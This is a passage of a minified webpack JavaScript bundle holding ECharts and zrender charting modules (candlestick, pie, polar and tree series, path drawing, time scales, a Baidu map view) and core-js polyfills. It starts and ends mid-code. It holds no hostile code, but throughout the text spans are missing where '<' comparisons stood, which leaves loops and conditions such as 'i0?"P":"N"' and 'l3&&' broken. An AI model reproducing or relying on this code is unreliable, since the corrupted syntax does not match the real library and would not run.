r=p(t);l(s(e).records,(function(e){e&&i(e,n,r.dispatchAction)})),h(r.pendings,t)}))}s(e).initialized||(s(e).initialized=!0,n("click",i.curry(f,"click")),n("mousemove",i.curry(f,"mousemove")),n("globalout",d))}function h(e,t){var n,i=e.showTip.length,r=e.hideTip.length;i?n=e.showTip[i-1]:r&&(n=e.hideTip[r-1]),n&&(n.dispatchAction=null,t.dispatchAction(n))}function d(e,t,n){e.handler("leave",null,n)}function f(e,t,n,i){t.handler(e,n,i)}function p(e){var t={showTip:[],hideTip:[]},n=function(i){var r=t[i.type];r?r.push(i):(i.dispatchAction=n,e.dispatchAction(i))};return{dispatchAction:n,pendings:t}}function g(e,t){if(!r.node){var n=t.getZr(),i=(s(n).records||{})[e];i&&(s(n).records[e]=null)}}t.register=u,t.unregister=g},"17ed":function(e,t,n){e.exports={default:n("511f"),__esModule:!0}},1836:function(e,t,n){var i=n("6ca1"),r=n("6438").f,o={}.toString,a="object"==typeof window&&window&&Object.getOwnPropertyNames?Object.getOwnPropertyNames(window):[],s=function(e){try{return r(e)}catch(t){return a.slice()}};e.exports.f=function(e){return a&&"[object Window]"==o.call(e)?s(e):r(i(e))}},"18c0":function(e,t,n){var i=n("6d8b"),r=n("e0d8"),o=n("8e43"),a=r.prototype,s=r.extend({type:"ordinal",init:function(e,t){e&&!i.isArray(e)||(e=new o({categories:e})),this._ordinalMeta=e,this._extent=t||[0,e.categories.length-1]},parse:function(e){return"string"===typeof e?this._ordinalMeta.getOrdinal(e):Math.round(e)},contain:function(e){return e=this.parse(e),a.contain.call(this,e)&&null!=this._ordinalMeta.categories[e]},normalize:function(e){return a.normalize.call(this,this.parse(e))},scale:function(e){return Math.round(a.scale.call(this,e))},getTicks:function(){var e=[],t=this._extent,n=t[0];while(n<=t[1])e.push(n),n++;return e},getLabel:function(e){if(!this.isBlank())return this._ordinalMeta.categories[e]},count:function(){return this._extent[1]-this._extent[0]+1},unionExtentFromData:function(e,t){this.unionExtent(e.getApproximateExtent(t))},getOrdinalMeta:function(){return this._ordinalMeta},niceTicks:i.noop,niceExtent:i.noop});s.create=function(){return new s};var l=s;e.exports=l},1917:function(e,t){t.f={}.propertyIsEnumerable},1953:function(e,t,n){var i=n("2449"),r=i.extend({type:"markLine",defaultOption:{zlevel:0,z:5,symbol:["circle","arrow"],symbolSize:[8,16],precision:2,tooltip:{trigger:"item"},label:{show:!0,position:"end",distance:5},lineStyle:{type:"dashed"},emphasis:{label:{show:!0},lineStyle:{width:3}},animationEasing:"linear"}});e.exports=r},"19aa":function(e,t){e.exports=function(e,t,n){if(!(e instanceof t))throw TypeError("Incorrect "+(n?n+" ":"")+"invocation");return e}},"19e2":function(e,t,n){var i=n("6d8b"),r=n("e887"),o=n("2306"),a=n("cbe5"),s=n("b0af"),l=s.createClipPath,u=["itemStyle"],c=["emphasis","itemStyle"],h=["color","color0","borderColor","borderColor0"],d=r.extend({type:"candlestick",render:function(e,t,n){this.group.removeClipPath(),this._updateDrawMode(e),this._isLargeDraw?this._renderLarge(e):this._renderNormal(e)},incrementalPrepareRender:function(e,t,n){this._clear(),this._updateDrawMode(e)},incrementalRender:function(e,t,n,i){this._isLargeDraw?this._incrementalRenderLarge(e,t):this._incrementalRenderNormal(e,t)},_updateDrawMode:function(e){var t=e.pipelineContext.large;(null==this._isLargeDraw||t^this._isLargeDraw)&&(this._isLargeDraw=t,this._clear())},_renderNormal:function(e){var t=e.getData(),n=this._data,i=this.group,r=t.getLayout("isSimpleBox"),a=e.get("clip",!0),s=e.coordinateSystem,l=s.getArea&&s.getArea();this._data||i.removeAll(),t.diff(n).add((function(n){if(t.hasValue(n)){var s,u=t.getItemLayout(n);if(a&&g(l,u))return;s=p(u,n,!0),o.initProps(s,{shape:{points:u.ends}},e,n),m(s,t,n,r),i.add(s),t.setItemGraphicEl(n,s)}})).update((function(s,u){var c=n.getItemGraphicEl(u);if(t.hasValue(s)){var h=t.getItemLayout(s);a&&g(l,h)?i.remove(c):(c?o.updateProps(c,{shape:{points:h.ends}},e,s):c=p(h,s),m(c,t,s,r),i.add(c),t.setItemGraphicEl(s,c))}else i.remove(c)})).remove((function(e){var t=n.getItemGraphicEl(e);t&&i.remove(t)})).execute(),this._data=t},_renderLarge:function(e){this._clear(),_(e,this.group);var t=e.get("clip",!0)?l(e.coordinateSystem,!1,e):null;t?this.group.setClipPath(t):this.group.removeClipPath()},_incrementalRenderNormal:function(e,t){var n,i=t.getData(),r=i.getLayout("isSimpleBox");while(null!=(n=e.next())){var o,a=i.getItemLayout(n);o=p(a,n),m(o,i,n,r),o.incremental=!0,this.group.add(o)}},_incrementalRenderLarge:function(e,t){_(t,this.group,!0)},remove:function(e){this._clear()},_clear:function(){this.group.removeAll(),this._data=null},dispose:i.noop}),f=a.extend({type:"normalCandlestickBox",shape:{},buildPath:function(e,t){var n=t.points;this.__simpleBox?(e.moveTo(n[4][0],n[4][1]),e.lineTo(n[6][0],n[6][1])):(e.moveTo(n[0][0],n[0][1]),e.lineTo(n[1][0],n[1][1]),e.lineTo(n[2][0],n[2][1]),e.lineTo(n[3][0],n[3][1]),e.closePath(),e.moveTo(n[4][0],n[4][1]),e.lineTo(n[5][0],n[5][1]),e.moveTo(n[6][0],n[6][1]),e.lineTo(n[7][0],n[7][1]))}});function p(e,t,n){var i=e.ends;return new f({shape:{points:n?v(i,e):i},z2:100})}function g(e,t){for(var n=!0,i=0;i0?"P":"N",o=i.getVisual("borderColor"+r)||i.getVisual("color"+r),a=n.getModel(u).getItemStyle(h);t.useStyle(a),t.style.fill=null,t.style.stroke=o}var x=d;e.exports=x},"19eb":function(e,t,n){var i=n("6d8b"),r=n("2b61"),o=n("d5b7"),a=n("9e2e");function s(e){for(var t in e=e||{},o.call(this,e),e)e.hasOwnProperty(t)&&"style"!==t&&(this[t]=e[t]);this.style=new r(e.style,this),this._rect=null,this.__clipPaths=null}s.prototype={constructor:s,type:"displayable",__dirty:!0,invisible:!1,z:0,z2:0,zlevel:0,draggable:!1,dragging:!1,silent:!1,culling:!1,cursor:"pointer",rectHover:!1,progressive:!1,incremental:!1,globalScaleRatio:1,beforeBrush:function(e){},afterBrush:function(e){},brush:function(e,t){},getBoundingRect:function(){},contain:function(e,t){return this.rectContain(e,t)},traverse:function(e,t){e.call(t,this)},rectContain:function(e,t){var n=this.transformCoordToLocal(e,t),i=this.getBoundingRect();return i.contain(n[0],n[1])},dirty:function(){this.__dirty=this.__dirtyText=!0,this._rect=null,this.__zr&&this.__zr.refresh()},animateStyle:function(e){return this.animate("style",e)},attrKV:function(e,t){"style"!==e?o.prototype.attrKV.call(this,e,t):this.style.set(t)},setStyle:function(e,t){return this.style.set(e,t),this.dirty(!1),this},useStyle:function(e){return this.style=new r(e,this),this.dirty(!1),this},calculateTextPosition:null},i.inherits(s,o),i.mixin(s,a);var l=s;e.exports=l},"19fa":function(e,t,n){var i=n("fc5e"),r=n("c901");e.exports=function(e){return function(t,n){var o,a,s=String(r(t)),l=i(n),u=s.length;return l<0||l>=u?e?"":void 0:(o=s.charCodeAt(l),o<55296||o>56319||l+1===u||(a=s.charCodeAt(l+1))<56320||a>57343?e?s.charAt(l):o:e?s.slice(l,l+2):a-56320+(o-55296<<10)+65536)}}},"1a14":function(e,t,n){var i=n("77e9"),r=n("faf5"),o=n("3397"),a=Object.defineProperty;t.f=n("0bad")?Object.defineProperty:function(e,t,n){if(i(e),t=o(t,!0),i(n),r)try{return a(e,t,n)}catch(s){}if("get"in n||"set"in n)throw TypeError("Accessors not supported!");return"value"in n&&(e[t]=n.value),e}},"1ab3":function(e,t,n){var i=n("6d8b"),r=n("2306"),o=n("e887");function a(e,t,n,i){var r=t.getData(),o=this.dataIndex,a=r.getName(o),l=t.get("selectedOffset");i.dispatchAction({type:"pieToggleSelect",from:e,name:a,seriesId:t.id}),r.each((function(e){s(r.getItemGraphicEl(e),r.getItemLayout(e),t.isSelected(r.getName(e)),l,n)}))}function s(e,t,n,i,r){var o=(t.startAngle+t.endAngle)/2,a=Math.cos(o),s=Math.sin(o),l=n?i:0,u=[a*l,s*l];r?e.animate().when(200,{position:u}).start("bounceOut"):e.attr("position",u)}function l(e,t){r.Group.call(this);var n=new r.Sector({z2:2}),i=new r.Polyline,o=new r.Text;this.add(n),this.add(i),this.add(o),this.updateData(e,t,!0)}var u=l.prototype;u.updateData=function(e,t,n){var o=this.childAt(0),a=this.childAt(1),l=this.childAt(2),u=e.hostModel,c=e.getItemModel(t),h=e.getItemLayout(t),d=i.extend({},h);d.label=null;var f=u.getShallow("animationTypeUpdate");if(n){o.setShape(d);var p=u.getShallow("animationType");"scale"===p?(o.shape.r=h.r0,r.initProps(o,{shape:{r:h.r}},u,t)):(o.shape.endAngle=h.startAngle,r.updateProps(o,{shape:{endAngle:h.endAngle}},u,t))}else"expansion"===f?o.setShape(d):r.updateProps(o,{shape:d},u,t);var g=e.getItemVisual(t,"color");o.useStyle(i.defaults({lineJoin:"bevel",fill:g},c.getModel("itemStyle").getItemStyle())),o.hoverStyle=c.getModel("emphasis.itemStyle").getItemStyle();var m=c.getShallow("cursor");m&&o.attr("cursor",m),s(this,e.getItemLayout(t),u.isSelected(e.getName(t)),u.get("selectedOffset"),u.get("animation"));var v=!n&&"transition"===f;this._updateLabel(e,t,v),this.highDownOnUpdate=u.get("silent")?null:function(e,t){var n=u.isAnimationEnabled()&&c.get("hoverAnimation");"emphasis"===t?(a.ignore=a.hoverIgnore,l.ignore=l.hoverIgnore,n&&(o.stopAnimation(!0),o.animateTo({shape:{r:h.r+u.get("hoverOffset")}},300,"elasticOut"))):(a.ignore=a.normalIgnore,l.ignore=l.normalIgnore,n&&(o.stopAnimation(!0),o.animateTo({shape:{r:h.r}},300,"elasticOut")))},r.setHoverStyle(this)},u._updateLabel=function(e,t,n){var i=this.childAt(1),o=this.childAt(2),a=e.hostModel,s=e.getItemModel(t),l=e.getItemLayout(t),u=l.label,c=e.getItemVisual(t,"color");if(!u||isNaN(u.x)||isNaN(u.y))o.ignore=o.normalIgnore=o.hoverIgnore=i.ignore=i.normalIgnore=i.hoverIgnore=!0;else{var h={points:u.linePoints||[[u.x,u.y],[u.x,u.y],[u.x,u.y]]},d={x:u.x,y:u.y};n?(r.updateProps(i,{shape:h},a,t),r.updateProps(o,{style:d},a,t)):(i.attr({shape:h}),o.attr({style:d})),o.attr({rotation:u.rotation,origin:[u.x,u.y],z2:10});var f=s.getModel("label"),p=s.getModel("emphasis.label"),g=s.getModel("labelLine"),m=s.getModel("emphasis.labelLine");c=e.getItemVisual(t,"color");r.setLabelStyle(o.style,o.hoverStyle={},f,p,{labelFetcher:e.hostModel,labelDataIndex:t,defaultText:u.text,autoColor:c,useInsideStyle:!!u.inside},{textAlign:u.textAlign,textVerticalAlign:u.verticalAlign,opacity:e.getItemVisual(t,"opacity")}),o.ignore=o.normalIgnore=!f.get("show"),o.hoverIgnore=!p.get("show"),i.ignore=i.normalIgnore=!g.get("show"),i.hoverIgnore=!m.get("show"),i.setStyle({stroke:c,opacity:e.getItemVisual(t,"opacity")}),i.setStyle(g.getModel("lineStyle").getLineStyle()),i.hoverStyle=m.getModel("lineStyle").getLineStyle();var v=g.get("smooth");v&&!0===v&&(v=.4),i.setShape({smooth:v})}},i.inherits(l,r.Group);var c=o.extend({type:"pie",init:function(){var e=new r.Group;this._sectorGroup=e},render:function(e,t,n,r){if(!r||r.from!==this.uid){var o=e.getData(),s=this._data,u=this.group,c=t.get("animation"),h=!s,d=e.get("animationType"),f=e.get("animationTypeUpdate"),p=i.curry(a,this.uid,e,c,n),g=e.get("selectedMode");if(o.diff(s).add((function(e){var t=new l(o,e);h&&"scale"!==d&&t.eachChild((function(e){e.stopAnimation(!0)})),g&&t.on("click",p),o.setItemGraphicEl(e,t),u.add(t)})).update((function(e,t){var n=s.getItemGraphicEl(t);h||"transition"===f||n.eachChild((function(e){e.stopAnimation(!0)})),n.updateData(o,e),n.off("click"),g&&n.on("click",p),u.add(n),o.setItemGraphicEl(e,n)})).remove((function(e){var t=s.getItemGraphicEl(e);u.remove(t)})).execute(),c&&o.count()>0&&(h?"scale"!==d:"transition"!==f)){for(var m=o.getItemLayout(0),v=1;isNaN(m.startAngle)&&v=i.r0}}}),h=c;e.exports=h},"1be4":function(e,t,n){var i=n("d066");e.exports=i("document","documentElement")},"1c0b":function(e,t){e.exports=function(e){if("function"!=typeof e)throw TypeError(String(e)+" is not a function");return e}},"1c5f":function(e,t,n){var i=n("401b"),r=n("6d8b"),o=n("0c37"),a=o.getCurvenessForEdge;function s(e){var t=e.coordinateSystem;if(!t||"view"===t.type){var n=e.getGraph();n.eachNode((function(e){var t=e.getModel();e.setLayout([+t.get("x"),+t.get("y")])})),l(n,e)}}function l(e,t){e.eachEdge((function(e,n){var o=r.retrieve3(e.getModel().get("lineStyle.curveness"),-a(e,t,n,!0),0),s=i.clone(e.node1.getLayout()),l=i.clone(e.node2.getLayout()),u=[s,l];+o&&u.push([(s[0]+l[0])/2-(s[1]-l[1])*o,(s[1]+l[1])/2-(l[0]-s[0])*o]),e.setLayout(u)}))}t.simpleLayout=s,t.simpleLayoutEdge=l},"1c7e":function(e,t,n){var i=n("b622"),r=i("iterator"),o=!1;try{var a=0,s={next:function(){return{done:!!a++}},return:function(){o=!0}};s[r]=function(){return this},Array.from(s,(function(){throw 2}))}catch(l){}e.exports=function(e,t){if(!t&&!o)return!1;var n=!1;try{var i={};i[r]=function(){return{next:function(){return{done:n=!0}}}},e(i)}catch(l){}return n}},"1ccf":function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("6d8b")),o=n("fd27"),a=n("3842"),s=a.parsePercent,l=n("697e"),u=l.createScaleByModel,c=l.niceScaleExtent,h=n("2039"),d=n("ee1a"),f=d.getStackedDimension;function p(e,t,n){var i=t.get("center"),o=n.getWidth(),a=n.getHeight();e.cx=s(i[0],o),e.cy=s(i[1],a);var l=e.getRadiusAxis(),u=Math.min(o,a)/2,c=t.get("radius");null==c?c=[0,"100%"]:r.isArray(c)||(c=[0,c]),c=[s(c[0],u),s(c[1],u)],l.inverse?l.setExtent(c[1],c[0]):l.setExtent(c[0],c[1])}function g(e,t){var n=this,i=n.getAngleAxis(),o=n.getRadiusAxis();if(i.scale.setExtent(1/0,-1/0),o.scale.setExtent(1/0,-1/0),e.eachSeries((function(e){if(e.coordinateSystem===n){var t=e.getData();r.each(t.mapDimension("radius",!0),(function(e){o.scale.unionExtentFromData(t,f(t,e))})),r.each(t.mapDimension("angle",!0),(function(e){i.scale.unionExtentFromData(t,f(t,e))}))}})),c(i.scale,i.model),c(o.scale,o.model),"category"===i.type&&!i.onBand){var a=i.getExtent(),s=360/i.scale.count();i.inverse?a[1]+=s:a[1]-=s,i.setExtent(a[0],a[1])}}function m(e,t){if(e.type=t.get("type"),e.scale=u(t),e.onBand=t.get("boundaryGap")&&"category"===e.type,e.inverse=t.get("inverse"),"angleAxis"===t.mainType){e.inverse^=t.get("clockwise");var n=t.get("startAngle");e.setExtent(n,n+(e.inverse?-360:360))}t.axis=e,e.model=t}n("78f0");var v={dimensions:o.prototype.dimensions,create:function(e,t){var n=[];return e.eachComponent("polar",(function(e,i){var r=new o(i);r.update=g;var a=r.getRadiusAxis(),s=r.getAngleAxis(),l=e.findAxisModel("radiusAxis"),u=e.findAxisModel("angleAxis");m(a,l),m(s,u),p(r,e,t),n.push(r),e.coordinateSystem=r,r.model=e})),e.eachSeries((function(t){if("polar"===t.get("coordinateSystem")){var n=e.queryComponents({mainType:"polar",index:t.get("polarIndex"),id:t.get("polarId")})[0];t.coordinateSystem=n.coordinateSystem}})),n}};h.register("polar",v)},"1cdc":function(e,t,n){var i=n("342f");e.exports=/(iphone|ipod|ipad).*applewebkit/i.test(i)},"1d80":function(e,t){e.exports=function(e){if(void 0==e)throw TypeError("Can't call method on "+e);return e}},"1da1":function(e,t,n){"use strict";n.d(t,"a",(function(){return r}));n("d3b7");function i(e,t,n,i,r,o,a){try{var s=e[o](a),l=s.value}catch(u){return void n(u)}s.done?t(l):Promise.resolve(l).then(i,r)}function r(e){return function(){var t=this,n=arguments;return new Promise((function(r,o){var a=e.apply(t,n);function s(e){i(a,r,o,s,l,"next",e)}function l(e){i(a,r,o,s,l,"throw",e)}s(void 0)}))}}},"1dde":function(e,t,n){var i=n("d039"),r=n("b622"),o=n("2d00"),a=r("species");e.exports=function(e){return o>=51||!i((function(){var t=[],n=t.constructor={};return n[a]=function(){return{foo:1}},1!==t[e](Boolean).foo}))}},"1e32":function(e,t,n){var i=n("6d8b"),r=n("3842"),o=r.parsePercent,a=n("ee1a"),s=a.isDimensionStacked;function l(e){return e.get("stack")||"__ec_stack_"+e.seriesIndex}function u(e,t){return t.dim+e.model.componentIndex}function c(e,t,n){var r={},o=h(i.filter(t.getSeriesByType(e),(function(e){return!t.isSeriesFiltered(e)&&e.coordinateSystem&&"polar"===e.coordinateSystem.type})));t.eachSeriesByType(e,(function(e){if("polar"===e.coordinateSystem.type){var t=e.getData(),n=e.coordinateSystem,i=n.getBaseAxis(),a=u(n,i),c=l(e),h=o[a][c],d=h.offset,f=h.width,p=n.getOtherAxis(i),g=e.coordinateSystem.cx,m=e.coordinateSystem.cy,v=e.get("barMinHeight")||0,y=e.get("barMinAngle")||0;r[c]=r[c]||[];for(var _=t.mapDimension(p.dim),b=t.mapDimension(i.dim),x=s(t,_),w="radius"!==i.dim||!e.get("roundCap",!0),k="radius"===p.dim?p.dataToRadius(0):p.dataToAngle(0),S=0,M=t.count();S=0?"p":"n",O=k;if(x&&(r[c][L]||(r[c][L]={p:k,n:k}),O=r[c][L][E]),"radius"===p.dim){var P=p.dataToRadius(D)-k,R=i.dataToAngle(L);Math.abs(P)=r/3?1:2),l=t.y-i(a)*o*(o>=r/3?1:2);a=t.angle-Math.PI/2,e.moveTo(s,l),e.lineTo(t.x+n(a)*o,t.y+i(a)*o),e.lineTo(t.x+n(t.angle)*r,t.y+i(t.angle)*r),e.lineTo(t.x-n(a)*o,t.y-i(a)*o),e.lineTo(s,l)}});e.exports=r},"1f1a":function(e,t,n){var i=n("6d8b"),r=n("e0d3"),o=n("6cb7"),a=n("4319"),s=n("7023"),l=n("eeea"),u=o.extend({type:"geo",coordinateSystem:null,layoutMode:"box",init:function(e){o.prototype.init.apply(this,arguments),r.defaultEmphasis(e,"label",["show"])},optionUpdated:function(){var e=this.option,t=this;e.regions=l.getFilledRegions(e.regions,e.map,e.nameMap),this._optionModelMap=i.reduce(e.regions||[],(function(e,n){return n.name&&e.set(n.name,new a(n,t)),e}),i.createHashMap()),this.updateSelectedMap(e.regions)},defaultOption:{zlevel:0,z:0,show:!0,left:"center",top:"center",aspectScale:null,silent:!1,map:"",boundingCoords:null,center:null,zoom:1,scaleLimit:null,label:{show:!1,color:"#000"},itemStyle:{borderWidth:.5,borderColor:"#444",color:"#eee"},emphasis:{label:{show:!0,color:"rgb(100,0,0)"},itemStyle:{color:"rgba(255,215,0,0.8)"}},regions:[]},getRegionModel:function(e){return this._optionModelMap.get(e)||new a(null,this,this.ecModel)},getFormattedLabel:function(e,t){t=t||"normal";var n=this.getRegionModel(e),i=n.get(("normal"===t?"":t+".")+"label.formatter"),r={name:e};return"function"===typeof i?(r.status=t,i(r)):"string"===typeof i?i.replace("{a}",null!=e?e:""):void 0},setZoom:function(e){this.option.zoom=e},setCenter:function(e){this.option.center=e}});i.mixin(u,s);var c=u;e.exports=c},"1fab":function(e,t){var n=Array.prototype.slice,i=function(e){this._$handlers={},this._$eventProcessor=e};function r(e,t){var n=e._$eventProcessor;return null!=t&&n&&n.normalizeQuery&&(t=n.normalizeQuery(t)),t}function o(e,t,n,i,o,a){var s=e._$handlers;if("function"===typeof n&&(o=i,i=n,n=null),!i||!t)return e;n=r(e,n),s[t]||(s[t]=[]);for(var l=0;l3&&(r=n.call(r,1));for(var a=t.length,s=0;s4&&(r=n.call(r,1,r.length-1));for(var a=r[r.length-1],s=t.length,l=0;lthis._ux||_(t-this._yi)>this._uy||this._len<5;return this.addData(u.L,e,t),this._ctx&&n&&(this._needsDash()?this._dashedLineTo(e,t):this._ctx.lineTo(e,t)),n&&(this._xi=e,this._yi=t),this},bezierCurveTo:function(e,t,n,i,r,o){return this.addData(u.C,e,t,n,i,r,o),this._ctx&&(this._needsDash()?this._dashedBezierTo(e,t,n,i,r,o):this._ctx.bezierCurveTo(e,t,n,i,r,o)),this._xi=r,this._yi=o,this},quadraticCurveTo:function(e,t,n,i){return this.addData(u.Q,e,t,n,i),this._ctx&&(this._needsDash()?this._dashedQuadraticTo(e,t,n,i):this._ctx.quadraticCurveTo(e,t,n,i)),this._xi=n,this._yi=i,this},arc:function(e,t,n,i,r,o){return this.addData(u.A,e,t,n,n,i,r-i,0,o?0:1),this._ctx&&this._ctx.arc(e,t,n,i,r,o),this._xi=m(r)*n+e,this._yi=v(r)*n+t,this},arcTo:function(e,t,n,i,r){return this._ctx&&this._ctx.arcTo(e,t,n,i,r),this},rect:function(e,t,n,i){return this._ctx&&this._ctx.rect(e,t,n,i),this.addData(u.R,e,t,n,i),this},closePath:function(){this.addData(u.Z);var e=this._ctx,t=this._x0,n=this._y0;return e&&(this._needsDash()&&this._dashedLineTo(t,n),e.closePath()),this._xi=t,this._yi=n,this},fill:function(e){e&&e.fill(),this.toStatic()},stroke:function(e){e&&e.stroke(),this.toStatic()},setLineDash:function(e){if(e instanceof Array){this._lineDash=e,this._dashIdx=0;for(var t=0,n=0;nt.length&&(this._expandData(),t=this.data);for(var n=0;n0&&f<=e||c<0&&f>=e||0===c&&(h>0&&m<=t||h<0&&m>=t))i=this._dashIdx,n=a[i],f+=c*n,m+=h*n,this._dashIdx=(i+1)%v,c>0&&fl||h>0&&mu||s[i%2?"moveTo":"lineTo"](c>=0?p(f,e):g(f,e),h>=0?p(m,t):g(m,t));c=f-e,h=m-t,this._dashOffset=-y(c*c+h*h)},_dashedBezierTo:function(e,t,n,r,o,a){var s,l,u,c,h,d=this._dashSum,f=this._dashOffset,p=this._lineDash,g=this._ctx,m=this._xi,v=this._yi,_=i.cubicAt,b=0,x=this._dashIdx,w=p.length,k=0;for(f<0&&(f=d+f),f%=d,s=0;s<1;s+=.1)l=_(m,e,n,o,s+.1)-_(m,e,n,o,s),u=_(v,t,r,a,s+.1)-_(v,t,r,a,s),b+=y(l*l+u*u);for(;xf)break;s=(k-f)/b;while(s<=1)c=_(m,e,n,o,s),h=_(v,t,r,a,s),x%2?g.moveTo(c,h):g.lineTo(c,h),s+=p[x]/b,x=(x+1)%w;x%2!==0&&g.lineTo(o,a),l=o-c,u=a-h,this._dashOffset=-y(l*l+u*u)},_dashedQuadraticTo:function(e,t,n,i){var r=n,o=i;n=(n+2*e)/3,i=(i+2*t)/3,e=(this._xi+2*e)/3,t=(this._yi+2*t)/3,this._dashedBezierTo(e,t,n,i,r,o)},toStatic:function(){var e=this.data;e instanceof Array&&(e.length=this._len,b&&(this.data=new Float32Array(e)))},getBoundingRect:function(){c[0]=c[1]=d[0]=d[1]=Number.MAX_VALUE,h[0]=h[1]=f[0]=f[1]=-Number.MAX_VALUE;for(var e=this.data,t=0,n=0,i=0,s=0,l=0;ll||_(a-r)>c||d===h-1)&&(e.lineTo(o,a),i=o,r=a);break;case u.C:e.bezierCurveTo(s[d++],s[d++],s[d++],s[d++],s[d++],s[d++]),i=s[d-2],r=s[d-1];break;case u.Q:e.quadraticCurveTo(s[d++],s[d++],s[d++],s[d++]),i=s[d-2],r=s[d-1];break;case u.A:var p=s[d++],g=s[d++],y=s[d++],b=s[d++],x=s[d++],w=s[d++],k=s[d++],S=s[d++],M=y>b?y:b,A=y>b?1:y/b,C=y>b?b/y:1,T=Math.abs(y-b)>.001,I=x+w;T?(e.translate(p,g),e.rotate(k),e.scale(A,C),e.arc(0,0,M,x,I,1-S),e.scale(1/A,1/C),e.rotate(-k),e.translate(-p,-g)):e.arc(p,g,M,x,I,1-S),1===d&&(t=m(x)*y+p,n=v(x)*b+g),i=m(I)*y+p,r=v(I)*b+g;break;case u.R:t=i=s[d],n=r=s[d+1],e.rect(s[d++],s[d++],s[d++],s[d++]);break;case u.Z:e.closePath(),i=t,r=n}}}},x.CMD=u;var w=x;e.exports=w},2114:function(e,t,n){var i=n("313e");function r(e){for(var t in e)if(e.hasOwnProperty(t))return!1;return!0}var o=i.extendComponentView({type:"bmap",render:function(e,t,n){var o=!0,a=e.getBMap(),s=n.getZr().painter.getViewportRoot(),l=e.coordinateSystem,u=function(t,i){if(!o){var r=s.parentNode.parentNode.parentNode,a=[-parseInt(r.style.left,10)||0,-parseInt(r.style.top,10)||0];s.style.left=a[0]+"px",s.style.top=a[1]+"px",l.setMapOffset(a),e.__mapOffset=a,n.dispatchAction({type:"bmapRoam"})}};function c(){o||n.dispatchAction({type:"bmapRoam"})}a.removeEventListener("moving",this._oldMoveHandler),a.removeEventListener("moveend",this._oldMoveHandler),a.removeEventListener("zoomend",this._oldZoomEndHandler),a.addEventListener("moving",u),a.addEventListener("moveend",u),a.addEventListener("zoomend",c),this._oldMoveHandler=u,this._oldZoomEndHandler=c;var h=e.get("roam");h&&"scale"!==h?a.enableDragging():a.disableDragging(),h&&"move"!==h?(a.enableScrollWheelZoom(),a.enableDoubleClickZoom(),a.enablePinchToZoom()):(a.disableScrollWheelZoom(),a.disableDoubleClickZoom(),a.disablePinchToZoom());var d=e.__mapStyle,f=e.get("mapStyle")||{},p=JSON.stringify(f);JSON.stringify(d)!==p&&(r(m)||a.setMapStyle(i.util.clone(f)),e.__mapStyle=JSON.parse(p));var g=e.__mapStyle2,m=e.get("mapStyleV2")||{},v=JSON.stringify(m);JSON.stringify(g)!==v&&(r(m)||a.setMapStyleV2(i.util.clone(m)),e.__mapStyle2=JSON.parse(v)),o=!1}});e.exports=o},2145:function(e,t){var n={};function i(e,t){n[e]=t}function r(e){return n[e]}t.register=i,t.get=r},2163:function(e,t,n){var i=n("4f85"),r=n("06c7"),o=n("eda2"),a=o.encodeHTML,s=n("4319"),l=i.extend({type:"series.tree",layoutInfo:null,layoutMode:"box",getInitialData:function(e){var t={name:e.name,children:e.data},n=e.leaves||{},i=new s(n,this,this.ecModel),o=r.createTree(t,this,a);function a(e){e.wrapMethod("getItemModel",(function(e,t){var n=o.getNodeByDataIndex(t);return n.children.length&&n.isExpand||(e.parentModel=i),e}))}var l=0;o.eachNode("preorder",(function(e){e.depth>l&&(l=e.depth)}));var u=e.expandAndCollapse,c=u&&e.initialTreeDepth>=0?e.initialTreeDepth:l;return o.root.eachNode("preorder",(function(e){var t=e.hostTree.data.getRawDataItem(e.dataIndex);e.isExpand=t&&null!=t.collapsed?!t.collapsed:e.depth<=c})),o.data},getOrient:function(){var e=this.get("orient");return"horizontal"===e?e="LR":"vertical"===e&&(e="TB"),e},setZoom:function(e){this.option.zoom=e},setCenter:function(e){this.option.center=e},formatTooltip:function(e){var t=this.getData().tree,n=t.root.children[0],i=t.getNodeByDataIndex(e),r=i.getValue(),o=i.name;while(i&&i!==n)o=i.parentNode.name+"."+o,i=i.parentNode;return a(o+(isNaN(r)||null==r?"":" : "+r))},defaultOption:{zlevel:0,z:2,coordinateSystem:"view",left:"12%",top:"12%",right:"12%",bottom:"12%",layout:"orthogonal",edgeShape:"curve",edgeForkPosition:"50%",roam:!1,nodeScaleRatio:.4,center:null,zoom:1,orient:"LR",symbol:"emptyCircle",symbolSize:7,expandAndCollapse:!0,initialTreeDepth:2,lineStyle:{color:"#ccc",width:1.5,curveness:.5},itemStyle:{color:"lightsteelblue",borderColor:"#c23531",borderWidth:1.5},label:{show:!0,color:"#555"},leaves:{label:{show:!0}},animationEasing:"linear",animationDuration:700,animationDurationUpdate:1e3}});e.exports=l},"216a":function(e,t,n){var i=n("6d8b"),r=n("3842"),o=n("eda2"),a=n("944e"),s=n("89e3"),l=s.prototype,u=Math.ceil,c=Math.floor,h=1e3,d=60*h,f=60*d,p=24*f,g=function(e,t,n,i){while(n>>1;e[r][1]n&&(s=n);var l=v.length,h=g(v,s,0,l),d=v[Math.min(h,l-1)],f=d[1];if("year"===d[0]){var p=o/f,m=r.nice(p/e,!0);f*=m}var y=this.getSetting("useUTC")?0:60*new Date(+i[0]||+i[1]).getTimezoneOffset()*1e3,_=[Math.round(u((i[0]-y)/f)*f+y),Math.round(c((i[1]-y)/f)*f+y)];a.fixExtent(_,i),this._stepLvl=d,this._interval=f,this._niceExtent=_},parse:function(e){return+r.parseDate(e)}});i.each(["contain","normalize"],(function(e){m.prototype[e]=function(t){return l[e].call(this,this.parse(t))}}));var v=[["hh:mm:ss",h],["hh:mm:ss",5*h],["hh:mm:ss",10*h],["hh:mm:ss",15*h],["hh:mm:ss",30*h],["hh:mm\nMM-dd",d],["hh:mm\nMM-dd",5*d],["hh:mm\nMM-dd",10*d],["hh:mm\nMM-dd",15*d],["hh:mm\nMM-dd",30*d],["hh:mm\nMM-dd",f],["hh:mm\nMM-dd",2*f],["hh:mm\nMM-dd",6*f],["hh:mm\nMM-dd",12*f],["MM-dd\nyyyy",p],["MM-dd\nyyyy",2*p],["MM-dd\nyyyy",3*p],["MM-dd\nyyyy",4*p],["MM-dd\nyyyy",5*p],["MM-dd\nyyyy",6*p],["week",7*p],["MM-dd\nyyyy",10*p],["week",14*p],["week",21*p],["month",31*p],["week",42*p],["month",62*p],["week",70*p],["quarter",95*p],["month",31*p*4],["month",31*p*5],["half-year",380*p/2],["month",31*p*8],["month",31*p*10],["year",380*p]];m.create=function(e){return new m({useUTC:e.ecModel.get("useUTC")})};var y=m;e.exports=y},"217b":function(e,t,n){var 